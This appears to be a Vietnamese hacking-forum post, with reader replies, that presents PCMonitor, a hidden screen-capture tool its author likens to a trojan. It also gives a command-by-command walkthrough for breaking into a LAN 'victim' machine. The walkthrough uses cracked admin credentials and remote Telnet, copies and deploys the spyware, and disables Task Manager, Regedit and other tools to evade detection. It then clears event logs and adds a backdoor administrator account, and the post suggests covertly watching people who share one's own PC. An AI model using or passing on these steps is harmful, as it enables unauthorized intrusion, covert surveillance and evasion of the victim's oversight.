Chủ đề: Thâm nhập và theo dõi trong mạng LAN bằng PCMonitor

Bài này là của anh Sơn học chung với LK bên athena viết và tool này của anh viết luôn !trước khi viết bài này em xin cám ơn anh Sơn nha !!

Chào các bạn

Mình xin giới thiệu đến các bạn một tool mới PCMonitor. Tool này sẽ thực hiện theo dõi PC Screen của các máy trong mạng LAN.
Bài viết này sẽ chia làm 3 phần:

- Phần 1: Giới thiệu sơ lược về PCMonitor
- Phần 2: Hướng dẫn sử dụng PCMonitor
- Phần 3: Demo xâm nhập mạng LAN, sử dụng PCMonitor làm công cụ theo dõi

< O:p< p>Phần 1: Giới thiệu về PCMonitor< font O:p<>

< O:p< p>PCMonitor là chương trình theo dõi màn hình máy tính của ai đó trên mạng bằng cách capture toàn bộ màn hình và lưu trữ dạng file .bmp trên máy của người đó. Mặc dù trên thị trường có rất nhiều software hỗ trợ việc theo dõi giám sát các máy trên mạng, tuy nhiên PCMonitor vẫn có những điểm khác biệt riêng sau đây:

- Khả năng theo dõi offline: Hầu hết các chương trình theo dõi màn hình chỉ hoạt động được khi có sự kết nối mạng và các máy phải trong điều kiện online với nhau. PCMonitor hoạt động theo cơ chế khác: Nó hoạt động như một Trojan, chỉ cần hẹn thời gian hoạt động và kích hoạt trên máy nào đó là xong. Dữ liệu có thể lấy trực tiếp hoặc thông qua mạng nếu có sự kết nối.

- Khả năng ẩn mình: PCMonitor được thiết kế ẩn và có khả năng khóa các công cụ theo dõi hệ thống như MMC, Regedit, Msconfig, Task Manager nhằm tránh sự phát hiện của người đang bị theo dõi.

- Có thể tương tác với PCMonitor bằng Cmd hoặc GUI

- Ở chế độ GUI, PCMonitor có thể dùng như bộ xem ảnh tự động.

Tuy nhiên PCMonitor vẫn còn một số điểm chế. Hạn chế lớn nhất có thể nhận ra của chương trình đó là các file ảnh được lưu dạng bmp, kích thước lớn. Mình sẽ cố giải quyết vấn đề này ở version sau.
Phần 2: Hướng dẫn sử dụng PCMonitor

Cài đặt chương trình:
Chương trình gồm 4 file: Deploy.exe, StpPCMonitor.exe, Comdl32.ocx và Readme.txt
Để cài đặt, chỉ cần chạy file Deploy.exe, khi đó sẽ xuất hiện thêm các file Config.txt, PCMonitor.vbs, PCMonitor.bat, TlntSt.bat, TlntStp.bat và folder Pictures nơi sẽ lưu các file hình đã capture.

Có 2 chế độ sử dụng: Cmd và GUI

1. Chế độ sử dụng GUI:
- Để xuất hiện chế độ GUI bạn chuyển về thư mục chứa chương trình, gõ dòng lệnh sau:
pcmonitor start show.
- GUI có 2 chế độ là Monitor mode và View pictures mode.

Ở View pictures mode:
- Để chọn chế độ này bạn chọn Mode, uncheck Monitor.
- Để xem ảnh tự động, bạn chọn Mode, View pictures để mở folder chứa file ảnh, chọn các ảnh bạn muốn xem, click Open. Các ảnh bạn chọn sẽ được xem 2 giây/hình.
- Ngoài ra bạn cũng có thể tự điều khiển việc xem hình bằng cách chọn các điều khiển trên thanh công cụ hoặc click chuột phải trên screen để biết cách sử dụng.

Ở Monitor mode:
- Để chọn chế độ này bạn chọn Mode, check Monitor
- Vào Option để chọn những sự thay đổi cũng như thiết lập cấu hình cho chương trình.
+ Test Capture: Test nơi bạn lưu hình ảnh
+ Path: Thay đổi đường dẫn lưu hình ảnh nếu bạn muốn
+ Schedule: Thiết lập thời gian làm việc của chương trình
+ Autorun: Tùy chọn này để chương trình có thể khởi động cùng Windows. Mỗi lần Windows khởi động, PCMonitor sẽ khởi động cùng và kiểm tra đã đến thời gian cần theo dõi chưa? Nếu chưa thì chương trình sẽ tự động thoát để tránh sự phát hiện.
+ Lock System: Hiển thị trạng thái của MMC, Msconfig, Regedit, Task Manager. Bạn có thể disable hoặc enable các trạng thái này nhằm tránh sự phát hiện của người sử dụng.
- Chọn Help để xem hướng dẫn sử dụng chương trình cả 2 chế độ Cmd và GUI.

2. Chế độ sử dụng Cmd:
Chế độ này dùng để cài đặt cấu hình trên máy local hoặc điều khiển theo dõi từ xa thông qua Telnet.
HTML Code:

Code:

Syntax:
   pcmonitor <option1> [option2] [<date> <time1> to <time2> frq=<interval>]

<option1>
? or /? or /help
           Xem hướng dẫn sử dụng command
start [hide/show]
   hide    Khởi động chương trình ở chế độ ẩn
   show    Khởi động chương trình ở chế độ GUI
           VD: Khởi động ở chế độ ẩn
           Cmd: pcmonitor start	
           hoặc  pcmonitor start hide
           VD: Khởi động ở chế độ GUI
           Cmd: pcmonitor start show
stop       Dừng chương trình
renew      Mặc định, file Config.txt và folder Pictures được tạo ra cùng folder với  Deploy.exe. Config.txt chứa những cài đặt của người sử dụng, folder Pictures chứa ảnh được capture.
path [pathname]
           Chỉ rõ nơi lưu ảnh
           VD: pcmonitor path d:\picture
schedule [all/add/del/del-all] [<date> <time1> to <time2> frq=<interval>]
   all     Xem tất cả các thiết lập phiên làm việc đã cấu hình
           VD: pcmonitor schedule all
   add     Thêm vào 1 phiên làm việc mới
   del     Xóa 1 phiên làm việc được chỉ rõ
 del-all   Xóa tất cả các phiên làm việc
           VD: pcmonitor schedule del-all
  <date>   Ngày theo định dạng mm/dd/yyyy
  <time>   Giờ theo định dạng hh:mm
<interval> Khoảng thời gian được tính theo phút
           VD: add 1 session vào ngày 23/7/2007 từ 7:30 đến 20:59, tần số chụp 10 phút/hình
           Cmd: pcmonitor schedule add 07/23/2007 07:30 to 20:59 frq=10
           VD: del 1 session vào ngày  23/7/2007 từ 7:30 đến 8, tần số chụp 5 giây/hình
           Cmd: pcmonitor schedule del 07/23/2007 07:30 to 08:00 frq=0.083
test       Capture màn hình và lưu ở đường dẫn đã được thiết lập
autorun [yes/no]
           Enable hoặc disable PCMonitor khởi động cùng với Windows
regedit [yes/no]
           Enable hoặc disable Regedit tool
mmc [yes/no]
           Enable hoặc disable MMC (gpedit, Computer management...)
taskmanager [yes/no]
           Enable hoặc disable Task Mannager
msconfig [yes/no]
           Enable hoặc disable msconfig tool

Phần 3: Demo xâm nhập mạng LAN, sử dụng PCMonitor làm công cụ theo dõi

Để thực hiện kết nối với máy nào đó, việc đầu tiên phải biết password của username có quyền càng cao càng tốt để có thể chiếm quyền kiểm soát hệ thống. Trong bài viết này mình không đề cập đến làm thế nào để crack được password, mà chỉ demo xâm nhập mạng LAN và sử dụng PCMonitor làm công cụ theo dõi. Giả sử ta đã crack được password “admin” của user “admin” trên máy có IP “192.168.1.3”.

1. Mở cổng Telnet
Tạo kết nối với máy victim:
net use \\192.168.1.3\ipc$ "admin" /user:"admin"
Mở cổng Telnet:
sc \\192.168.1.3 config tlntsvr start= auto
sc \\192.168.1.3 start tlntsvr

2. Telnet vào máy victim, share đĩa C nơi sẽ copy dữ liệu
Telnet vào máy victim
telnet 192.168.1.3
Trên console telnet:
Share đĩa C trên máy victim:
net share x=c:\ /unlimited
Tạo folder nơi sẽ lưu dữ liệu
md c:\xyz

3. Copy dữ liệu lên máy victim
Tạo console cmd mới kiểm tra share source trên máy victim
net view \\192.168.1.3
Copy dữ liệu từ folder pcmonitor sang máy victim
copy pcmonitor \\192.168.1.3\x\xyz
(Trong trường hợp này chỉ cần copy 2 file StpPCMonitor.exe, Deploy.exe là đủ)

Trên console telnet
4. Kích hoạt chương trình PCMonitor
c:\xyz>deploy
Trong folder xyz trên máy victim xuất hiện thêm:
Config.txt, Tlntst.bat, Tlntstp.bat, PCMonitor.vbs, PCMonitor.bat và folder Pictures

5. Ðể victim không thể tìm ra PCMonitor, bạn phải khóa các công cụ theo dõi hệ thống
Disable Regedit:
c:\xyz>pcmonitor regedit no
Disable MMC:
c:\xyz>pcmonitor mmc no
Disable Task Manager:
c:\xyz>pcmonitor taskmanager no
Disable Msconfig:
c:\xyz>pcmonitor msconfig no

6. Cấu hình chương trình theo dõi
VD theo dõi ngày 15/2/2008 từ 13g đến 15g10', tần số 0.5 phút/hình
c:\xyz>pcmonitor schedule add 2/15/2008 13:0 to 15:10 frq=0.5
Cài đặt PCMonitor tự khởi động cùng Windows để thực hiện theo dõi bất kỳ thời gian nào bạn mong muốn:
c:\xyz>pcmonitor autorun yes

7. Khởi động việc theo dõi
Chương trình PCMonitor sẽ hoạt động vào lần khởi động kế tiếp của Windows.
Nếu bạn muốn chương trình hoạt động ngay, thực hiện như sau:
Enable service schedule:
sc config schedule start= auto
sc start schedule
Kiểm tra thời gian trên máy victim
c:\xyz>time
Giả sử đồng hồ báo 13giờ 5'
Hẹn giờ khởi động:
c:\xyz>at \\192.168.1.3 1:6pm /interactive "c:\xyz\tlntst.bat"
Nếu muốn chương trình dừng tại thời điểm 13giờ7':
c:\xyz>at \\192.168.1.3 1:7pm /interactive "c:\xyz\tlntstp.bat"

Ghi chú: Trong console Telnet chỉ cho phép tương tác dạng plain text nên ta phải thực hiện bước 7 để khởi động hoặc ngừng “tức thì” chương trình.

Đến đây PCMonitor đã được cấu hình và hoạt động. Tiếp theo ta sẽ rút lui và xóa dấu vết để tránh sự nghi ngờ của victim.

8. Rút lui, xóa dấu vết
Trên console Telnet:
- Hủy share source x
c:\xyz>net share x /del
Thoát khỏi Telnet

Trên console cmd:
- Ðóng cổng Telnet:
sc \\192.168.1.3 config tlntsvr start= disabled
sc \\192.168.1.3 stop tlntsvr
- Ðóng Service Schedule
sc \\192.168.1.3 config schedule start= disabled
sc \\192.168.1.3 stop schedule
- Xóa dấu vết lưu trên Event Viewer
Vào Computer Management. Chọn Connect to another Computer, nhập IP máy victim.
Vào System Tools, Event Viewer. Clear all Events ở Application, Security, System.

- Tạo user hacker, password 123, thuộc nhóm administrators để lần sau thâm nhập thuận lợi hơn
net user hacker 123 /add
net localgroup administrators hacker /add
Tuy nhiên, việc tạo ra user mới rất dễ bị lộ. Bạn có thể gán quyền administrators cho 1 user nào đó mà bạn biết password như Guest chẳng hạn.

- Kết thúc session kết nối đến máy victim:
net use \\192.168.1.3\ipc$ /del

Chú ý: Với PCMonitor, bạn cũng có thể cài đặt chương trình trên chính máy bạn để theo dõi ai đó dùng chung máy:
Bạn chỉ cần thực hiện các bước 4, 5, 6. Khâu khởi động chương trình cũng đơn giản hơn nhiều:
Khởi động:
c:\xyz>pcmonitor start
Dừng:
c:\xyz>pcmonitor stop

(bởi Mountain)

tool hay lắm,Matnaden sẽ test trước trên máy mình,Thx K

^^ NHưng mà tool này vẫn chưa có thể qua mặt được chuơng trình diệt virus! đây chính là các yếu điểm của nó !! NHưng mà coi bài này thì mình biết được thêm nhiều lệnh command line trong Windows ! Cũng hay đó chứ :)

Sao file tải về ko giải nén được bạn nhỉ!!

bạn có thể hướng dẫn chi tiết bằng hình ảnh không?giúp mình với nhé.Thank

cám ơn bạn, bạn có hình ảnh không đưa lên vài tấm demo để mọi người tham khảo đi

đầy nè. giúp mình nha. mình nè newbie :D http://ca3.upanh.com/8.755.12963659.CGH0/untitled.bmp

Gửi bởi docchuong

đầy nè. giúp mình nha. mình nè newbie :D http://ca3.upanh.com/8.755.12963659.CGH0/untitled.bmp

Bạn tải chương trình winrar về cài đặt, rồi giải nén bình thường.(Mà mình nhớ trong win có thể đọc và giải nén file.zip ko cần phải dùng chương trình hỗ trợ nào sao máy bạn lại ko nhận file zip ta :-?)

Chương trình winrar

Ua?làm sao để gõ đc câu lệnh "pcmonitor start show" hả bạn?gõ ở đâu?bạn giúp mình với.